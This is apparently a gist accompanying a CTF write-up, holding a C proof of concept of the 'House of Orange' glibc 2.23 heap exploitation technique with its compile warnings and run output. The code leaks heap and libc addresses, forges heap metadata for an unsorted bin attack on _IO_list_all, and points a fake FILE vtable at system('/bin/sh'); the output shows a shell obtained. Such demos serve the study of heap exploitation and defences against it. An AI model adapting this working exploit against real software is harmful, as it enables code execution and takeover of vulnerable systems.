House of Orange attack / http://4ngelboy.blogspot.jp/2016/10/hitcon-ctf-qual-2016-house-of-orange.html

gistfile1.txt

$ gcc house_of_orange.c -o house_of_orange
house_of_orange.c: In function ‘main’:
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
     *(void **)(p1+0x80+0x8) = 0x61;                    /* fake size to set main_arena->bins[10] */
                             ^
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
     *(void **)(p1+0x80+0x30) = -1;
                              ^

$ ./house_of_orange
[+] allocate p1, p2, p3, p4, p5

[+] free p4 and p2

[+] leak heap addresses
addr_heap = 0x19895f0
addr_p2 = 0x19894b0

[+] free p5

[+] leak libc addresses
arena_top = 0x7ff6c6db0b78
libc_base = 0x7ff6c69ed000
libc_system = 0x7ff6c6a32380
libc_IO_list_all = 0x7ff6c6db1520

[+] abuse p1 overflow

[+] allocate p6
*** Error in `./house_of_orange': malloc(): memory corruption: 0x00007ff6c6db1520 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x77725)[0x7ff6c6a64725]
/lib/x86_64-linux-gnu/libc.so.6(+0x819be)[0x7ff6c6a6e9be]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ff6c6a705a4]
./house_of_orange[0x400881]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ff6c6a0d830]
./house_of_orange[0x400599]
======= Memory map: ========
00400000-00401000 r-xp 00000000 fc:00 1722079                            /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange
00600000-00601000 r--p 00000000 fc:00 1722079                            /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange
00601000-00602000 rw-p 00001000 fc:00 1722079                            /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange
01989000-019aa000 rw-p 00000000 00:00 0                                  [heap]
7ff6c0000000-7ff6c0021000 rw-p 00000000 00:00 0
7ff6c0021000-7ff6c4000000 ---p 00000000 00:00 0
7ff6c67d7000-7ff6c67ed000 r-xp 00000000 fc:00 262679                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7ff6c67ed000-7ff6c69ec000 ---p 00016000 fc:00 262679                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7ff6c69ec000-7ff6c69ed000 rw-p 00015000 fc:00 262679                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7ff6c69ed000-7ff6c6bad000 r-xp 00000000 fc:00 262653                     /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6bad000-7ff6c6dac000 ---p 001c0000 fc:00 262653                     /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6dac000-7ff6c6db0000 r--p 001bf000 fc:00 262653                     /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6db0000-7ff6c6db2000 rw-p 001c3000 fc:00 262653                     /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6db2000-7ff6c6db6000 rw-p 00000000 00:00 0
7ff6c6db6000-7ff6c6ddc000 r-xp 00000000 fc:00 262629                     /lib/x86_64-linux-gnu/ld-2.23.so
7ff6c6fcc000-7ff6c6fcf000 rw-p 00000000 00:00 0
7ff6c6fd8000-7ff6c6fdb000 rw-p 00000000 00:00 0
7ff6c6fdb000-7ff6c6fdc000 r--p 00025000 fc:00 262629                     /lib/x86_64-linux-gnu/ld-2.23.so
7ff6c6fdc000-7ff6c6fdd000 rw-p 00026000 fc:00 262629                     /lib/x86_64-linux-gnu/ld-2.23.so
7ff6c6fdd000-7ff6c6fde000 rw-p 00000000 00:00 0
7ffd8137a000-7ffd8139b000 rw-p 00000000 00:00 0                          [stack]
7ffd813e3000-7ffd813e5000 r--p 00000000 00:00 0                          [vvar]
7ffd813e5000-7ffd813e7000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
$
Aborted (core dumped)

$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
        crypt add-on version 2.1 by Michael Glad and others
        GNU Libidn by Simon Josefsson
        Native POSIX Threads Library by Ulrich Drepper et al
        BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.

house_of_orange.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    puts("[+] allocate p1, p2, p3, p4, p5");
    char *p1 = malloc(0x80);
    char *p2 = malloc(0x90);
    char *p3 = malloc(0xa0);
    char *p4 = malloc(0xb0);
    char *p5 = malloc(0xc0);

    puts("\n[+] free p4 and p2");
    free(p4);
    free(p2);

    puts("\n[+] leak heap addresses");
    char *addr_heap = *(void **)p2;
    char *addr_p2 = addr_heap - 0x140;
    printf("addr_heap = %p\n", addr_heap);
    printf("addr_p2 = %p\n", addr_p2);

    puts("\n[+] free p5");
    free(p5);

    puts("\n[+] leak libc addresses");
    char *arena_top = *(void **)p2;
    char *libc_base = arena_top - 0x3c3b78;
    char *libc_system = libc_base + 0x45380;
    char *libc_IO_list_all = libc_base + 0x3c4520;
    printf("arena_top = %p\n", arena_top);
    printf("libc_base = %p\n", libc_base);
    printf("libc_system = %p\n", libc_system);
    printf("libc_IO_list_all = %p\n", libc_IO_list_all);

    puts("\n[+] abuse p1 overflow");
    memcpy(p1+0x80, "/bin/sh\x00", 8);                 /* first arg of __overflow() */
    *(void **)(p1+0x80+0x8) = 0x61;                    /* fake size to set main_arena->bins[10] */
    *(void **)(p1+0x80+0x18) = libc_IO_list_all-0x10;  /* unsorted bin attack */
    *(void **)(p1+0x80+0x28) = libc_system;            /* vtable->__overflow */
    *(void **)(p1+0x80+0x30) = -1;
    *(void **)(p1+0x80+0xa0) = addr_p2;                /* _chain->vtable */
    *(void **)(p1+0x80+0xd8) = addr_p2;                /* _IO_list_all->file->_chain */

    puts("\n[+] allocate p6");
    char *p6 = malloc(0xd0);

    return 0;
}